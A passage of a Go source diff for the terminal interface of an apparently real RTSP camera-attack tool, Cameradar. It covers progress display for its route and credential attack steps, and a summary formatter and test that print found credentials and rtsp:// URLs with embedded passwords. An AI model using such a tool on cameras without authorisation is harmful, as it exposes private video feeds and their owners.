import (
|
||||
"context"
|
||||
"strings"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
"github.com/charmbracelet/bubbles/progress"
|
||||
"github.com/charmbracelet/bubbles/spinner"
|
||||
"github.com/charmbracelet/bubbles/table"
|
||||
tea "github.com/charmbracelet/bubbletea"
|
||||
)
|
||||
|
||||
type modelState struct {
|
||||
steps []cameradar.Step
|
||||
status map[cameradar.Step]state
|
||||
logs []logMsg
|
||||
summaryStreams []cameradar.Stream
|
||||
summaryFinal bool
|
||||
buildInfo BuildInfo
|
||||
cancel context.CancelFunc
|
||||
debug bool
|
||||
spinner spinner.Model
|
||||
progress progress.Model
|
||||
width int
|
||||
height int
|
||||
quitting bool
|
||||
progressTotals map[cameradar.Step]int
|
||||
progressCounts map[cameradar.Step]int
|
||||
progressTarget float64
|
||||
progressVisible float64
|
||||
}
|
||||
|
||||
func (m *modelState) Init() tea.Cmd {
|
||||
return m.spinner.Tick
|
||||
}
|
||||
|
||||
func (m *modelState) Update(msg tea.Msg) (tea.Model, tea.Cmd) {
|
||||
var cmds []tea.Cmd
|
||||
|
||||
switch typed := msg.(type) {
|
||||
case stepMsg:
|
||||
m.handleStepMsg(typed)
|
||||
case logMsg:
|
||||
m.handleLogMsg(typed)
|
||||
case summaryMsg:
|
||||
m.handleSummaryMsg(typed)
|
||||
case progressMsg:
|
||||
m.handleProgressMsg(typed)
|
||||
case closeMsg:
|
||||
m.quitting = true
|
||||
case tea.KeyMsg:
|
||||
if typed.Type == tea.KeyCtrlC {
|
||||
if m.cancel != nil {
|
||||
m.cancel()
|
||||
}
|
||||
m.quitting = true
|
||||
return m, tea.Quit
|
||||
}
|
||||
case spinner.TickMsg:
|
||||
cmds = m.handleSpinnerMsg(typed)
|
||||
case tea.WindowSizeMsg:
|
||||
m.handleWindowSizeMsg(typed)
|
||||
case progress.FrameMsg:
|
||||
}
|
||||
|
||||
if len(cmds) == 0 {
|
||||
return m, nil
|
||||
}
|
||||
return m, tea.Batch(cmds...)
|
||||
}
|
||||
|
||||
func (m *modelState) handleStepMsg(msg stepMsg) {
|
||||
m.status[msg.step] = msg.state
|
||||
if msg.message != "" {
|
||||
level := logInfo
|
||||
if msg.state == stateError {
|
||||
level = logError
|
||||
}
|
||||
m.logs = append(m.logs, logMsg{level: level, step: msg.step, message: msg.message})
|
||||
}
|
||||
if msg.state == stateDone || msg.state == stateError {
|
||||
markStepComplete(m, msg.step)
|
||||
queueProgressUpdate(m)
|
||||
}
|
||||
}
|
||||
|
||||
func (m *modelState) handleLogMsg(msg logMsg) {
|
||||
m.logs = append(m.logs, msg)
|
||||
}
|
||||
|
||||
func (m *modelState) handleSummaryMsg(msg summaryMsg) {
|
||||
m.summaryStreams = msg.streams
|
||||
m.summaryFinal = msg.final
|
||||
if msg.final {
|
||||
m.status[cameradar.StepSummary] = stateDone
|
||||
markStepComplete(m, cameradar.StepSummary)
|
||||
queueProgressUpdate(m)
|
||||
m.quitting = true
|
||||
}
|
||||
}
|
||||
|
||||
func (m *modelState) handleProgressMsg(msg progressMsg) {
|
||||
if msg.total > 0 {
|
||||
m.progressTotals[msg.step] = msg.total
|
||||
if m.progressCounts[msg.step] > msg.total {
|
||||
m.progressCounts[msg.step] = msg.total
|
||||
}
|
||||
}
|
||||
|
||||
if msg.increment > 0 {
|
||||
m.progressCounts[msg.step] += msg.increment
|
||||
total := m.progressTotals[msg.step]
|
||||
if total > 0 && m.progressCounts[msg.step] > total {
|
||||
m.progressCounts[msg.step] = total
|
||||
}
|
||||
}
|
||||
|
||||
queueProgressUpdate(m)
|
||||
}
|
||||
|
||||
func (m *modelState) handleSpinnerMsg(msg spinner.TickMsg) []tea.Cmd {
|
||||
var cmds []tea.Cmd
|
||||
var cmd tea.Cmd
|
||||
m.spinner, cmd = m.spinner.Update(msg)
|
||||
cmds = append(cmds, cmd)
|
||||
advanceProgress(m)
|
||||
if m.quitting && progressComplete(*m) {
|
||||
cmds = append(cmds, tea.Quit)
|
||||
}
|
||||
return cmds
|
||||
}
|
||||
|
||||
func (m *modelState) handleWindowSizeMsg(msg tea.WindowSizeMsg) {
|
||||
m.width = msg.Width
|
||||
m.height = msg.Height
|
||||
m.progress.Width = progressWidth(msg.Width)
|
||||
}
|
||||
|
||||
func (m *modelState) View() string {
|
||||
var builder strings.Builder
|
||||
header := sectionStyle.Render(m.buildInfo.TUIHeader())
|
||||
headerLines := splitLines(header)
|
||||
builder.WriteString(strings.Join(headerLines, "\n"))
|
||||
builder.WriteString("\n\n")
|
||||
|
||||
stepsLines := m.renderSteps()
|
||||
builder.WriteString(strings.Join(stepsLines, "\n"))
|
||||
builder.WriteString("\n\n")
|
||||
|
||||
summaryHeight, logsHeight := m.layoutHeights(len(headerLines), len(stepsLines))
|
||||
logsLines := m.renderLogs(logsHeight)
|
||||
builder.WriteString(sectionStyle.Render("Logs"))
|
||||
builder.WriteString("\n")
|
||||
builder.WriteString(strings.Join(logsLines, "\n"))
|
||||
builder.WriteString("\n\n")
|
||||
|
||||
rowsToShow := max(1, summaryHeight-2)
|
||||
summaryTitle := renderSummaryTitle(m.summaryStreams)
|
||||
summaryTables := buildSummaryTables(m.summaryStreams, m.width, m.status, rowsToShow)
|
||||
builder.WriteString(sectionStyle.Render(summaryTitle))
|
||||
builder.WriteString("\n")
|
||||
for i, summary := range summaryTables {
|
||||
builder.WriteString(summaryTableStyle.Render(summary.table.View()))
|
||||
if i < len(summaryTables)-1 {
|
||||
builder.WriteString("\n")
|
||||
}
|
||||
}
|
||||
|
||||
return builder.String()
|
||||
}
|
||||
|
||||
func (m *modelState) FinalView() string {
|
||||
var builder strings.Builder
|
||||
header := sectionStyle.Render(m.buildInfo.TUIHeader())
|
||||
headerLines := splitLines(header)
|
||||
builder.WriteString(strings.Join(headerLines, "\n"))
|
||||
builder.WriteString("\n\n")
|
||||
|
||||
stepsLines := m.renderSteps()
|
||||
builder.WriteString(strings.Join(stepsLines, "\n"))
|
||||
builder.WriteString("\n\n")
|
||||
|
||||
builder.WriteString(sectionStyle.Render("Logs"))
|
||||
builder.WriteString("\n")
|
||||
logLines := m.renderLogsAll()
|
||||
if len(logLines) == 0 {
|
||||
builder.WriteString(dimStyle.Render("No events yet."))
|
||||
} else {
|
||||
builder.WriteString(strings.Join(logLines, "\n"))
|
||||
}
|
||||
builder.WriteString("\n\n")
|
||||
|
||||
summaryTitle := renderSummaryTitle(m.summaryStreams)
|
||||
visibility := summaryVisibility(summaryStatusAllDone())
|
||||
accessible, others := partitionStreams(m.summaryStreams)
|
||||
rows := append(buildSummaryRows(accessible, visibility), buildSummaryRows(others, visibility)...)
|
||||
if len(rows) == 0 {
|
||||
rows = []table.Row{emptySummaryRow()}
|
||||
}
|
||||
columns := summaryColumns(m.width, rows)
|
||||
builder.WriteString(sectionStyle.Render(summaryTitle))
|
||||
builder.WriteString("\n")
|
||||
builder.WriteString(renderSummaryTablePlain(columns, rows))
|
||||
return builder.String()
|
||||
}
|
||||
|
||||
func (m *modelState) renderSteps() []string {
|
||||
lines := []string{sectionStyle.Render("Steps"), renderProgress(m)}
|
||||
spinnerView := m.spinner.View()
|
||||
for _, step := range m.steps {
|
||||
lines = append(lines, renderStep(step, m.status[step], spinnerView))
|
||||
}
|
||||
return lines
|
||||
}
|
||||
|
||||
func (m *modelState) renderLogs(height int) []string {
|
||||
if height <= 0 {
|
||||
return nil
|
||||
}
|
||||
if len(m.logs) == 0 {
|
||||
lines := []string{dimStyle.Render("No events yet.")}
|
||||
return padLines(lines, height)
|
||||
}
|
||||
|
||||
start := 0
|
||||
if len(m.logs) > height {
|
||||
start = len(m.logs) - height
|
||||
}
|
||||
lines := make([]string, 0, min(height, len(m.logs)))
|
||||
for _, entry := range m.logs[start:] {
|
||||
lines = append(lines, renderLog(entry))
|
||||
}
|
||||
return padLines(lines, height)
|
||||
}
|
||||
|
||||
func (m *modelState) renderLogsAll() []string {
|
||||
if len(m.logs) == 0 {
|
||||
return nil
|
||||
}
|
||||
lines := make([]string, 0, len(m.logs))
|
||||
for _, entry := range m.logs {
|
||||
lines = append(lines, renderLog(entry))
|
||||
}
|
||||
return lines
|
||||
}
|
||||
|
||||
func (m *modelState) layoutHeights(headerLines, stepsLines int) (summaryHeight, logsHeight int) {
|
||||
if m.height <= 0 {
|
||||
return summaryMinHeight, len(m.logs)
|
||||
}
|
||||
|
||||
reserved := headerLines + 1 + stepsLines + 1 + 1 + 1
|
||||
remaining := m.height - reserved
|
||||
remaining = max(0, remaining)
|
||||
|
||||
switch {
|
||||
case remaining < summaryMinHeight:
|
||||
summaryHeight = max(3, remaining)
|
||||
case remaining > summaryMaxHeight:
|
||||
summaryHeight = summaryMaxHeight
|
||||
default:
|
||||
summaryHeight = remaining
|
||||
}
|
||||
|
||||
logsHeight = max(0, remaining-summaryHeight)
|
||||
|
||||
return summaryHeight, logsHeight
|
||||
}
|
||||
|
||||
// padLines appends empty strings until lines reaches height entries.
// A non-positive height returns the slice unchanged.
func padLines(lines []string, height int) []string {
	if height <= 0 {
		return lines
	}

	for missing := height - len(lines); missing > 0; missing-- {
		lines = append(lines, "")
	}
	return lines
}

// splitLines breaks a rendered string into its individual lines.
func splitLines(value string) []string {
	return strings.Split(value, "\n")
}
|
||||
@@ -0,0 +1,14 @@
|
||||
package ui
|
||||
|
||||
import "github.com/charmbracelet/lipgloss"
|
||||
|
||||
var (
|
||||
sectionStyle = lipgloss.NewStyle().Bold(true).Foreground(lipgloss.Color("63"))
|
||||
infoStyle = lipgloss.NewStyle().Foreground(lipgloss.Color("252"))
|
||||
debugStyle = lipgloss.NewStyle().Foreground(lipgloss.Color("244"))
|
||||
successStyle = lipgloss.NewStyle().Foreground(lipgloss.Color("42"))
|
||||
activeStyle = lipgloss.NewStyle().Foreground(lipgloss.Color("39"))
|
||||
errorStyle = lipgloss.NewStyle().Foreground(lipgloss.Color("203"))
|
||||
dimStyle = lipgloss.NewStyle().Foreground(lipgloss.Color("241"))
|
||||
summaryTableStyle = lipgloss.NewStyle().BorderStyle(lipgloss.NormalBorder()).BorderForeground(lipgloss.Color("240"))
|
||||
)
|
||||
@@ -0,0 +1,147 @@
|
||||
package ui
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"sort"
|
||||
"strconv"
|
||||
"strings"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
)
|
||||
|
||||
// FormatSummary builds a human-readable summary of discovered streams.
|
||||
func FormatSummary(streams []cameradar.Stream, _ error) string {
|
||||
accessible, others := partitionStreams(streams)
|
||||
|
||||
var builder strings.Builder
|
||||
builder.WriteString(fmt.Sprintf("Accessible streams: %d\n", len(accessible)))
|
||||
if len(accessible) == 0 {
|
||||
builder.WriteString("• None\n")
|
||||
} else {
|
||||
for _, stream := range accessible {
|
||||
builder.WriteString(formatStream(stream))
|
||||
}
|
||||
}
|
||||
|
||||
if len(others) > 0 {
|
||||
builder.WriteString("\n")
|
||||
builder.WriteString(fmt.Sprintf("Other discovered streams: %d\n", len(others)))
|
||||
for _, stream := range others {
|
||||
builder.WriteString(formatStream(stream))
|
||||
}
|
||||
}
|
||||
|
||||
return builder.String()
|
||||
}
|
||||
|
||||
func partitionStreams(streams []cameradar.Stream) ([]cameradar.Stream, []cameradar.Stream) {
|
||||
var accessible []cameradar.Stream
|
||||
var others []cameradar.Stream
|
||||
for _, stream := range streams {
|
||||
if stream.Available {
|
||||
accessible = append(accessible, stream)
|
||||
} else {
|
||||
others = append(others, stream)
|
||||
}
|
||||
}
|
||||
|
||||
// Sort streams by address and port.
|
||||
sort.Slice(accessible, func(i, j int) bool {
|
||||
if accessible[i].Address.String() == accessible[j].Address.String() {
|
||||
return accessible[i].Port < accessible[j].Port
|
||||
}
|
||||
return accessible[i].Address.String() < accessible[j].Address.String()
|
||||
})
|
||||
sort.Slice(others, func(i, j int) bool {
|
||||
if others[i].Address.String() == others[j].Address.String() {
|
||||
return others[i].Port < others[j].Port
|
||||
}
|
||||
return others[i].Address.String() < others[j].Address.String()
|
||||
})
|
||||
|
||||
return accessible, others
|
||||
}
|
||||
|
||||
func formatStream(stream cameradar.Stream) string {
|
||||
var builder strings.Builder
|
||||
builder.WriteString("• ")
|
||||
builder.WriteString(stream.Address.String())
|
||||
builder.WriteString(":")
|
||||
builder.WriteString(strconv.FormatUint(uint64(stream.Port), 10))
|
||||
|
||||
if stream.Device != "" {
|
||||
builder.WriteString(" (")
|
||||
builder.WriteString(stream.Device)
|
||||
builder.WriteString(")")
|
||||
}
|
||||
builder.WriteString("\n")
|
||||
|
||||
builder.WriteString(" Authentication: ")
|
||||
builder.WriteString(authTypeLabel(stream.AuthenticationType))
|
||||
builder.WriteString("\n")
|
||||
|
||||
if len(stream.Routes) > 0 {
|
||||
builder.WriteString(" Routes: ")
|
||||
builder.WriteString(strings.Join(stream.Routes, ", "))
|
||||
builder.WriteString("\n")
|
||||
} else {
|
||||
builder.WriteString(" Routes: not found\n")
|
||||
}
|
||||
|
||||
if stream.CredentialsFound {
|
||||
builder.WriteString(" Credentials: ")
|
||||
builder.WriteString(stream.Username)
|
||||
builder.WriteString(":")
|
||||
builder.WriteString(stream.Password)
|
||||
builder.WriteString("\n")
|
||||
} else {
|
||||
builder.WriteString(" Credentials: not found\n")
|
||||
}
|
||||
|
||||
builder.WriteString(" Availability: ")
|
||||
if stream.Available {
|
||||
builder.WriteString("yes\n")
|
||||
} else {
|
||||
builder.WriteString("no\n")
|
||||
}
|
||||
|
||||
if stream.RouteFound && stream.CredentialsFound {
|
||||
builder.WriteString(" RTSP URL: ")
|
||||
builder.WriteString(formatRTSPURL(stream))
|
||||
builder.WriteString("\n")
|
||||
}
|
||||
|
||||
builder.WriteString(" Admin panel: ")
|
||||
builder.WriteString(formatAdminPanelURL(stream))
|
||||
builder.WriteString("\n")
|
||||
|
||||
return builder.String()
|
||||
}
|
||||
|
||||
func formatRTSPURL(stream cameradar.Stream) string {
|
||||
path := "/" + strings.TrimLeft(strings.TrimSpace(stream.Route()), "/")
|
||||
|
||||
credentials := ""
|
||||
if stream.Username != "" || stream.Password != "" {
|
||||
credentials = stream.Username + ":" + stream.Password + "@"
|
||||
}
|
||||
|
||||
return fmt.Sprintf("rtsp://%s%s:%d%s", credentials, stream.Address.String(), stream.Port, path)
|
||||
}
|
||||
|
||||
func formatAdminPanelURL(stream cameradar.Stream) string {
|
||||
return fmt.Sprintf("http://%s/", stream.Address.String())
|
||||
}
|
||||
|
||||
func authTypeLabel(auth cameradar.AuthType) string {
|
||||
switch auth {
|
||||
case cameradar.AuthNone:
|
||||
return "none"
|
||||
case cameradar.AuthBasic:
|
||||
return "basic"
|
||||
case cameradar.AuthDigest:
|
||||
return "digest"
|
||||
default:
|
||||
return fmt.Sprintf("unknown(%d)", auth)
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,107 @@
|
||||
package ui_test
|
||||
|
||||
import (
|
||||
"errors"
|
||||
"net/netip"
|
||||
"strings"
|
||||
"testing"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
"github.com/Ullaakut/cameradar/v6/internal/ui"
|
||||
"github.com/stretchr/testify/assert"
|
||||
)
|
||||
|
||||
func TestFormatSummary(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
streams []cameradar.Stream
|
||||
err error
|
||||
wantContains []string
|
||||
wantNotContains []string
|
||||
orderedPairs [][2]string
|
||||
}{
|
||||
{
|
||||
name: "empty",
|
||||
streams: nil,
|
||||
wantContains: []string{
|
||||
"Accessible streams: 0",
|
||||
"• None",
|
||||
},
|
||||
wantNotContains: []string{
|
||||
"Other discovered streams",
|
||||
"Error:",
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "mixed streams with error",
|
||||
streams: []cameradar.Stream{
|
||||
{
|
||||
Device: "Model B",
|
||||
Address: netip.MustParseAddr("10.0.0.2"),
|
||||
Port: 554,
|
||||
Available: true,
|
||||
AuthenticationType: cameradar.AuthNone,
|
||||
},
|
||||
{
|
||||
Device: "Model A",
|
||||
Address: netip.MustParseAddr("10.0.0.1"),
|
||||
Port: 8554,
|
||||
Available: true,
|
||||
Routes: []string{"stream1", "stream2"},
|
||||
RouteFound: true,
|
||||
CredentialsFound: true,
|
||||
Username: "user",
|
||||
Password: "pass",
|
||||
AuthenticationType: cameradar.AuthBasic,
|
||||
},
|
||||
{
|
||||
Address: netip.MustParseAddr("10.0.0.3"),
|
||||
Port: 554,
|
||||
Available: false,
|
||||
AuthenticationType: cameradar.AuthDigest,
|
||||
},
|
||||
},
|
||||
err: errors.New("boom"),
|
||||
wantContains: []string{
|
||||
"Accessible streams: 2",
|
||||
"Other discovered streams: 1",
|
||||
"• 10.0.0.1:8554 (Model A)",
|
||||
"• 10.0.0.2:554 (Model B)",
|
||||
"• 10.0.0.3:554",
|
||||
"Authentication: basic",
|
||||
"Authentication: none",
|
||||
"Authentication: digest",
|
||||
"Routes: stream1, stream2",
|
||||
"Credentials: user:pass",
|
||||
"RTSP URL: rtsp://user:pass@10.0.0.1:8554/stream1",
|
||||
"Admin panel: http://10.0.0.1/",
|
||||
"Admin panel: http://10.0.0.2/",
|
||||
},
|
||||
wantNotContains: []string{
|
||||
"RTSP URL: rtsp://10.0.0.2",
|
||||
"Error:",
|
||||
},
|
||||
orderedPairs: [][2]string{
|
||||
{"• 10.0.0.1:8554", "• 10.0.0.2:554"},
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
for _, test := range tests {
|
||||
t.Run(test.name, func(t *testing.T) {
|
||||
got := ui.FormatSummary(test.streams, test.err)
|
||||
|
||||
for _, expected := range test.wantContains {
|
||||
assert.Contains(t, got, expected)
|
||||
}
|
||||
for _, unexpected := range test.wantNotContains {
|
||||
assert.NotContains(t, got, unexpected)
|
||||
}
|
||||
for _, pair := range test.orderedPairs {
|
||||
first := strings.Index(got, pair[0])
|
||||
second := strings.Index(got, pair[1])
|
||||
assert.True(t, first >= 0 && second >= 0 && first < second)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,714 @@
|
||||
package ui
|
||||
|
||||
import (
|
||||
"context"
|
||||
"fmt"
|
||||
"io"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
"github.com/charmbracelet/bubbles/progress"
|
||||
"github.com/charmbracelet/bubbles/spinner"
|
||||
"github.com/charmbracelet/bubbles/table"
|
||||
tea "github.com/charmbracelet/bubbletea"
|
||||
"github.com/charmbracelet/lipgloss"
|
||||
)
|
||||
|
||||
type state int
|
||||
|
||||
const (
|
||||
statePending state = iota
|
||||
stateActive
|
||||
stateDone
|
||||
stateError
|
||||
)
|
||||
|
||||
type logLevel int
|
||||
|
||||
const (
|
||||
logInfo logLevel = iota
|
||||
logDebug
|
||||
logError
|
||||
)
|
||||
|
||||
type stepMsg struct {
|
||||
step cameradar.Step
|
||||
state state
|
||||
message string
|
||||
}
|
||||
|
||||
type logMsg struct {
|
||||
level logLevel
|
||||
step cameradar.Step
|
||||
message string
|
||||
}
|
||||
|
||||
type progressMsg struct {
|
||||
step cameradar.Step
|
||||
total int
|
||||
increment int
|
||||
}
|
||||
|
||||
type closeMsg struct{}
|
||||
|
||||
type summaryMsg struct {
|
||||
streams []cameradar.Stream
|
||||
final bool
|
||||
}
|
||||
|
||||
type summaryTable struct {
|
||||
table table.Model
|
||||
}
|
||||
|
||||
const (
|
||||
summaryMinHeight = 8
|
||||
summaryMaxHeight = 10
|
||||
summaryColumnCount = 8
|
||||
)
|
||||
|
||||
// TUIReporter renders a Bubble Tea based UI.
|
||||
type TUIReporter struct {
|
||||
program *tea.Program
|
||||
debug bool
|
||||
once sync.Once
|
||||
closed chan struct{}
|
||||
mu sync.Mutex
|
||||
last []cameradar.Stream
|
||||
}
|
||||
|
||||
// NewTUIReporter creates a new Bubble Tea reporter.
|
||||
func NewTUIReporter(debug bool, out io.Writer, buildInfo BuildInfo, cancel context.CancelFunc) (*TUIReporter, error) {
|
||||
spin := spinner.New()
|
||||
spin.Spinner = spinner.Dot
|
||||
spin.Style = lipgloss.NewStyle().Foreground(lipgloss.Color("63"))
|
||||
|
||||
prog := progress.New(
|
||||
progress.WithDefaultGradient(),
|
||||
progress.WithFillCharacters('━', '·'),
|
||||
progress.WithoutPercentage(),
|
||||
progress.WithWidth(28),
|
||||
)
|
||||
|
||||
initial := &modelState{
|
||||
steps: cameradar.Steps(),
|
||||
status: make(map[cameradar.Step]state),
|
||||
debug: debug,
|
||||
buildInfo: buildInfo,
|
||||
cancel: cancel,
|
||||
spinner: spin,
|
||||
progress: prog,
|
||||
progressTotals: make(map[cameradar.Step]int),
|
||||
progressCounts: make(map[cameradar.Step]int),
|
||||
}
|
||||
|
||||
p := tea.NewProgram(initial, tea.WithInputTTY(), tea.WithOutput(out), tea.WithAltScreen())
|
||||
reporter := &TUIReporter{program: p, debug: debug, closed: make(chan struct{})}
|
||||
|
||||
go func() {
|
||||
model, err := p.Run()
|
||||
if err != nil {
|
||||
_, _ = fmt.Fprintf(out, "Error running TUI: %v\n", err)
|
||||
close(reporter.closed)
|
||||
return
|
||||
}
|
||||
|
||||
if rendered, ok := model.(*modelState); ok {
|
||||
output := rendered.FinalView()
|
||||
if len(rendered.summaryStreams) == 0 {
|
||||
fallback := reporter.snapshotSummary()
|
||||
if len(fallback) > 0 {
|
||||
tmp := &modelState{
|
||||
summaryStreams: fallback,
|
||||
width: rendered.width,
|
||||
status: summaryStatusAllDone(),
|
||||
}
|
||||
output = tmp.FinalView()
|
||||
}
|
||||
}
|
||||
_, _ = fmt.Fprintln(out, output)
|
||||
}
|
||||
close(reporter.closed)
|
||||
}()
|
||||
|
||||
return reporter, nil
|
||||
}
|
||||
|
||||
// Start implements Reporter.
|
||||
func (r *TUIReporter) Start(step cameradar.Step, message string) {
|
||||
r.send(stepMsg{step: step, state: stateActive, message: message})
|
||||
}
|
||||
|
||||
// Done implements Reporter.
|
||||
func (r *TUIReporter) Done(step cameradar.Step, message string) {
|
||||
r.send(stepMsg{step: step, state: stateDone, message: message})
|
||||
}
|
||||
|
||||
// Progress implements Reporter.
|
||||
func (r *TUIReporter) Progress(step cameradar.Step, message string) {
|
||||
if kind, value, ok := cameradar.ParseProgressMessage(message); ok {
|
||||
msg := progressMsg{step: step}
|
||||
if kind == "total" {
|
||||
msg.total = value
|
||||
}
|
||||
if kind == "tick" {
|
||||
msg.increment = value
|
||||
}
|
||||
r.send(msg)
|
||||
return
|
||||
}
|
||||
|
||||
r.send(logMsg{level: logInfo, step: step, message: message})
|
||||
}
|
||||
|
||||
// Debug implements Reporter.
|
||||
func (r *TUIReporter) Debug(step cameradar.Step, message string) {
|
||||
if !r.debug {
|
||||
return
|
||||
}
|
||||
|
||||
r.send(logMsg{level: logDebug, step: step, message: message})
|
||||
}
|
||||
|
||||
// Error implements Reporter.
|
||||
func (r *TUIReporter) Error(step cameradar.Step, err error) {
|
||||
if err == nil {
|
||||
return
|
||||
}
|
||||
|
||||
r.send(stepMsg{step: step, state: stateError, message: err.Error()})
|
||||
}
|
||||
|
||||
// Summary implements Reporter.
|
||||
func (r *TUIReporter) Summary(streams []cameradar.Stream, _ error) {
|
||||
cloned := copyStreams(streams)
|
||||
r.recordSummary(cloned)
|
||||
r.send(summaryMsg{streams: cloned, final: true})
|
||||
}
|
||||
|
||||
// UpdateSummary updates the summary section with partial results.
|
||||
func (r *TUIReporter) UpdateSummary(streams []cameradar.Stream) {
|
||||
cloned := copyStreams(streams)
|
||||
r.recordSummary(cloned)
|
||||
r.send(summaryMsg{streams: cloned, final: false})
|
||||
}
|
||||
|
||||
func (r *TUIReporter) recordSummary(streams []cameradar.Stream) {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
r.last = streams
|
||||
}
|
||||
|
||||
func (r *TUIReporter) snapshotSummary() []cameradar.Stream {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
return copyStreams(r.last)
|
||||
}
|
||||
|
||||
// Close implements Reporter.
|
||||
func (r *TUIReporter) Close() {
|
||||
r.once.Do(func() {
|
||||
r.send(closeMsg{})
|
||||
})
|
||||
|
||||
// Timeout after 2 seconds to avoid hanging forever.
|
||||
select {
|
||||
case <-r.closed:
|
||||
case <-time.After(2 * time.Second):
|
||||
}
|
||||
}
|
||||
|
||||
func (r *TUIReporter) send(msg tea.Msg) {
|
||||
if r.program == nil {
|
||||
return
|
||||
}
|
||||
|
||||
r.program.Send(msg)
|
||||
}
|
||||
|
||||
func renderStep(step cameradar.Step, state state, spinnerView string) string {
|
||||
label := cameradar.StepLabel(step)
|
||||
symbol := "·"
|
||||
style := dimStyle
|
||||
switch state {
|
||||
case stateActive:
|
||||
symbol = spinnerView
|
||||
style = activeStyle
|
||||
case stateDone:
|
||||
symbol = "✓"
|
||||
style = successStyle
|
||||
case stateError:
|
||||
symbol = "✗"
|
||||
style = errorStyle
|
||||
}
|
||||
return style.Render(fmt.Sprintf("%s %s", symbol, label))
|
||||
}
|
||||
|
||||
func renderLog(entry logMsg) string {
|
||||
prefix := "INFO"
|
||||
style := infoStyle
|
||||
if entry.level == logDebug {
|
||||
prefix = "DEBUG"
|
||||
style = debugStyle
|
||||
}
|
||||
if entry.level == logError {
|
||||
prefix = "ERROR"
|
||||
style = errorStyle
|
||||
}
|
||||
return style.Render(fmt.Sprintf("[%s] %s: %s", prefix, cameradar.StepLabel(entry.step), entry.message))
|
||||
}
|
||||
|
||||
func renderProgress(m *modelState) string {
|
||||
completed, total := progressCounts(m.steps, m.status)
|
||||
percent := progressPercent(m.steps, m.status, m.progressTotals, m.progressCounts)
|
||||
countLabel := dimStyle.Render(fmt.Sprintf("%3.0f%% %d/%d complete", percent*100, completed, total))
|
||||
return fmt.Sprintf("%s %s", m.progress.ViewAs(m.progressVisible), countLabel)
|
||||
}
|
||||
|
||||
func progressCounts(steps []cameradar.Step, status map[cameradar.Step]state) (int, int) {
|
||||
if len(steps) == 0 {
|
||||
return 0, 0
|
||||
}
|
||||
|
||||
completed := 0
|
||||
for _, step := range steps {
|
||||
switch status[step] {
|
||||
case stateDone, stateError:
|
||||
completed++
|
||||
}
|
||||
}
|
||||
|
||||
return completed, len(steps)
|
||||
}
|
||||
|
||||
func progressPercent(steps []cameradar.Step, status map[cameradar.Step]state, totals, counts map[cameradar.Step]int) float64 {
|
||||
weights := stepWeights()
|
||||
percent := 0.0
|
||||
for _, step := range steps {
|
||||
weight := weights[step]
|
||||
if weight <= 0 {
|
||||
continue
|
||||
}
|
||||
percent += weight * stepProgress(step, status, totals, counts)
|
||||
}
|
||||
if percent > 1 {
|
||||
return 1
|
||||
}
|
||||
return percent
|
||||
}
|
||||
|
||||
func stepWeights() map[cameradar.Step]float64 {
|
||||
return map[cameradar.Step]float64{
|
||||
cameradar.StepScan: 0.15,
|
||||
cameradar.StepAttackRoutes: 0.25,
|
||||
cameradar.StepDetectAuth: 0.05,
|
||||
cameradar.StepAttackCredentials: 0.35,
|
||||
cameradar.StepValidateStreams: 0.2,
|
||||
cameradar.StepSummary: 0.0,
|
||||
}
|
||||
}
|
||||
|
||||
func stepProgress(step cameradar.Step, status map[cameradar.Step]state, totals, counts map[cameradar.Step]int) float64 {
|
||||
if total := totals[step]; total > 0 {
|
||||
count := counts[step]
|
||||
if count >= total {
|
||||
return 1
|
||||
}
|
||||
return float64(count) / float64(total)
|
||||
}
|
||||
|
||||
switch status[step] {
|
||||
case stateDone, stateError:
|
||||
return 1
|
||||
default:
|
||||
return 0
|
||||
}
|
||||
}
|
||||
|
||||
func queueProgressUpdate(m *modelState) {
|
||||
desired := progressPercent(m.steps, m.status, m.progressTotals, m.progressCounts)
|
||||
if desired <= m.progressTarget {
|
||||
return
|
||||
}
|
||||
m.progressTarget = desired
|
||||
}
|
||||
|
||||
func advanceProgress(m *modelState) {
|
||||
if m.progressVisible >= m.progressTarget {
|
||||
return
|
||||
}
|
||||
remaining := m.progressTarget - m.progressVisible
|
||||
step := remaining * 0.2
|
||||
if step < 0.02 {
|
||||
step = 0.02
|
||||
}
|
||||
if m.quitting && step < 0.08 {
|
||||
step = 0.08
|
||||
}
|
||||
if remaining < step {
|
||||
m.progressVisible = m.progressTarget
|
||||
return
|
||||
}
|
||||
m.progressVisible += step
|
||||
}
|
||||
|
||||
func progressComplete(m modelState) bool {
|
||||
return m.progressVisible >= m.progressTarget
|
||||
}
|
||||
|
||||
func markStepComplete(m *modelState, step cameradar.Step) {
|
||||
if m.progressTotals[step] == 0 {
|
||||
m.progressTotals[step] = 1
|
||||
}
|
||||
if m.progressCounts[step] < m.progressTotals[step] {
|
||||
m.progressCounts[step] = m.progressTotals[step]
|
||||
}
|
||||
}
|
||||
|
||||
func progressWidth(width int) int {
|
||||
if width <= 0 {
|
||||
return 28
|
||||
}
|
||||
if width < 60 {
|
||||
return 20
|
||||
}
|
||||
if width < 100 {
|
||||
return 28
|
||||
}
|
||||
return 36
|
||||
}
|
||||
|
||||
func buildSummaryTables(streams []cameradar.Stream, width int, status map[cameradar.Step]state, maxRows int) []summaryTable {
|
||||
visibility := summaryVisibility(status)
|
||||
accessible, others := partitionStreams(streams)
|
||||
rows := append(buildSummaryRows(accessible, visibility), buildSummaryRows(others, visibility)...)
|
||||
if len(rows) == 0 {
|
||||
rows = []table.Row{emptySummaryRow()}
|
||||
}
|
||||
|
||||
if maxRows > 0 {
|
||||
switch {
|
||||
case len(rows) > maxRows:
|
||||
if maxRows == 1 {
|
||||
rows = []table.Row{summaryOverflowRow(len(rows))}
|
||||
} else {
|
||||
visibleRows := maxRows - 1
|
||||
hidden := len(rows) - visibleRows
|
||||
